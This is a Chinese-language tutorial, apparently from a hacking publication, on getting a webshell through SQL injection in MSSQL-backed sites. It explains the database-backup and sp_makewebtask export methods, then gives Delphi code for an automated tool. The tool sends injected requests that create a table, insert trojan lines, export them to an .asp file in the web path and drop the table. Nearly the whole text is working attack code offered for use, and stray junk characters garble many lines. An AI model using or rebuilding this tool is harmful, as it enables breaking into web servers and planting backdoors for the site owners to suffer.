SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
/ D- m% y/ _% |3 qN.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
! E4 O0 _# D8 ^8 u分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
% z* |' Z( N2 o9 m+ ?9 T* |再来看看CZY的方法吧。
CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
) P3 `% C) ]& R4 O+ n二．利用DELPHI去实现功能的前言
原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。

) Z6 R  |6 n' [4 G三．如何利用DELPHI得到WEBSHELL。
程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：


5 G: X  z, H$ g4 J& l: A
' Q, {- o. G7 V现在来写程序了。
! z1 Z( z# v0 s; d8 m0 H我们首先定义一个RECORD。
" Z: A* F6 B& ?) s如下：
Type
SetOption = Record
9 h5 _5 d+ H: V$ V- NTableName : String; //用来保存要创建的表名.
FieldName : String; //用来保存要创建的字段名.
$ l+ S$ ^) n- A! l; DFiledType : String; //用来保存创建的字段名类型.
3 g2 d, ~+ f4 QEnd;
FiledType字段类型的值是以下类型的一种：
Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
6 A  U' v( Y" G3 ?. G& N; K再定义一个全局变量：
Var
ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
+ ?5 E5 |( a7 r& M* ~代码如下：
procedure TMainForm.FormCreate(Sender: TObject);
begin
sOption.TableName :='cyfd'
sOption.FieldName :='gmemo'
sOption.FiledType :='text'
# c& l; ?# q7 N' i. ~end;
现在我们添加开始执行命令的代码。
先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
* v1 }, o" \2 F! ?创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
2 @( I* N* R- H" S在程序开始执行前,我们得先检查一下用户的输入
  z, [& i2 o9 X( [定义一个Checkinput函数.
如下：
Function CheckInput : Boolean;
Begin
, ?/ W* D/ S7 V7 `+ SResult := False;
: R" I2 p/ h9 B/ u9 \" eif Trim(urlet.Text) = '' then
Begin
5 S0 r# p' p  R. eApplication.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
( u; g/ B: O3 O4 kExit;
End;
  \( [3 |+ P! @3 Q8 |/ ^  T% R) jif Trim(ShellPathET.Text) = '' then
Begin
; K, E) d( j3 a# A7 Q$ c4 gApplication.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
* P" k0 k- |+ ]6 WExit;
: @6 P  V. s$ d; SEnd;
IF DefBDoor.Checked then
) e; r4 l3 X8 Q: mBegin
% V+ a5 T7 m/ j: `$ |if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
Begin
Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
. w% n2 `1 y3 xExit;
End;
End
Else
% M( `+ Z0 A/ t1 `) ]+ V" H0 P2 d# Z7 }if Not FileExists(CustomBdoorET.Text) then
3 t0 D/ `, l3 B5 L  `8 XBegin
Application.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
+ t# K* X( u9 `5 L1 ^# yEnd;
& x/ Y/ [6 H3 @1 I, k; p7 }在最开始加入:
/ L  {$ F. |. j0 o/ h4 a( B7 zIF Not CheckInput then Exit; //如果输入不合法就退出过程.
好了，如果用户输入没什么错，我们就来下面的代码。
) |5 s8 B- x* z+ ?3 ~7 t首先我们把IsStop设为假。创建BdoorList。
BDoorList := TstringList.Create;
5 Q5 K2 r( }) V$ a* w- K再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
# w, k0 ]2 b9 o+ j/ k# [好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
代码如下：
. k; Z  u7 F1 `BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
* P1 ~; ^# k0 L$ F+ u7 n# ~BDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
接下来.我们就提交建表的功能了.
Memo.Lines.Add('建表...');
9 }6 }$ Z. G& w, D/ c5 xMemo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
这样我们就创建了一个表。然后.我们向表中加记录:
代码如下:
Memo.Lines.Add('加数据...');
( \* G* L' b# _Memo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
+ G8 G! v# n+ {# DBegin
8 x& F) G' a4 W" W, [8 xIF IsStop then //这里如果点了停止按纽程序将终止任务.
$ d5 ?- @" I, X. y6 LBegin
* W0 r& M7 S. J% B$ r7 |$ d3 O& pBDoorList.Free;
Exit;
End; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
6 B7 l/ y: I' m9 R; wMemo.Lines.Add('Add Line '+Inttostr(i+1));
End;
. |' m, d* r# d' ]- S现在就是导出数据生成木马了.
Memo.Lines.Add('导出数据...');
, ^- g. H( O: ^: u; j$ [* }2 fMemo.Lines.Add('');
% p& s) Z; d, G& M5 o; PIF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
$ G$ v) W" o" q* [! j& cNMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
Else //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
这样我们的任务就完成了。下面来释放变量.
4 o4 X0 g) t% a' B. `: zBDoorList.Free;
" U, ]1 I3 d& L8 R再来向停止按纽中添加点击事件：
, h, l" e9 n) R) m" d$ X一行代码就行了：IsStop := True;
8 g; Q, ]2 M! i! K3 O到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
3 e  Q. N  `3 d设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
第一个名称为：TableNameET //保用户输入的存临时表
: s" k0 b0 U: m/ a9 b! Y7 c( T; z第二个名称为：FieldNameET //用来保存用户输入的字段名.
) l  A( ~% ]& y: I/ Q再添加一个Combobox　//用来保存用户所选的字段类型值.
名称：FieldTypeCombox
) \9 Z3 b' I$ S" A; a5 w6 XOK.界面如下：
" o  z% `8 x! C! z0 n) e/ I* Z7 I
代码如下:
# P  ^) q7 R& R! ~( {定义一个过程,主表单好调用这个设置。
* G  i! U! I* ^# w3 fProcedure ShowSet;
5 G5 x" m# Z- ?. g+ S3 LBegin
9 f% l6 g5 f9 s9 I0 y! Y! _) c# IApplication.CreateForm(TSetForm,SetForm);
2 i+ |* D$ U: B# o& a( ^/ ZWith SetForm do
, o. Z" O, Q9 ?* Z3 uBegin
TableNameET.Text := sOption.TableName;
FieldNameET.Text := sOption.FieldName;
FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
, e& C* g6 o2 k+ Y6 m& n. O" F" MEnd;
0 S% R! K0 \: w# X, V$ S! nSetForm.ShowModal;
SetForm.Free;
$ M, r0 T9 {8 V0 ZEnd;
在主表单中设置的点击事件中添加上showset过程就行了。
- h4 V" g7 @+ d' f( s: {下面就是点击确定的代码了。
# `# C0 d$ S) j2 T6 r" kIF CheckInput then
1 ?: J: ?/ U3 v( ]3 g3 WBegin
8 q- i' o% W; M1 P( _7 _; hsOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
4 D3 A" _% H; R3 s. PClose;
End;
- x- C5 N' e. w3 o" m. c5 B- ~这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
& w, A" F0 A2 @% I3 E5 i代码如下:
Function CheckInput : Boolean;
Begin
9 N; v  S( r3 M/ f/ S# M& v2 V# ~Result := False;
% u  v( [$ u2 N' m0 wIF Trim(TableNameET.Text)='' then
! a( {- h% C0 Q* f! w* EBegin
Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
  _* T$ Z; D- {8 _" YIF Trim(FieldNameET.Text)='' then
Begin
Application.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
Exit;
8 V, `9 c7 R! T& e" p7 j( rEnd;
0 I% M% Z% S  g: s: fResult := True;
End;
( ]7 @) C/ f* i( U6 h0 |到这里程序就完了。</P>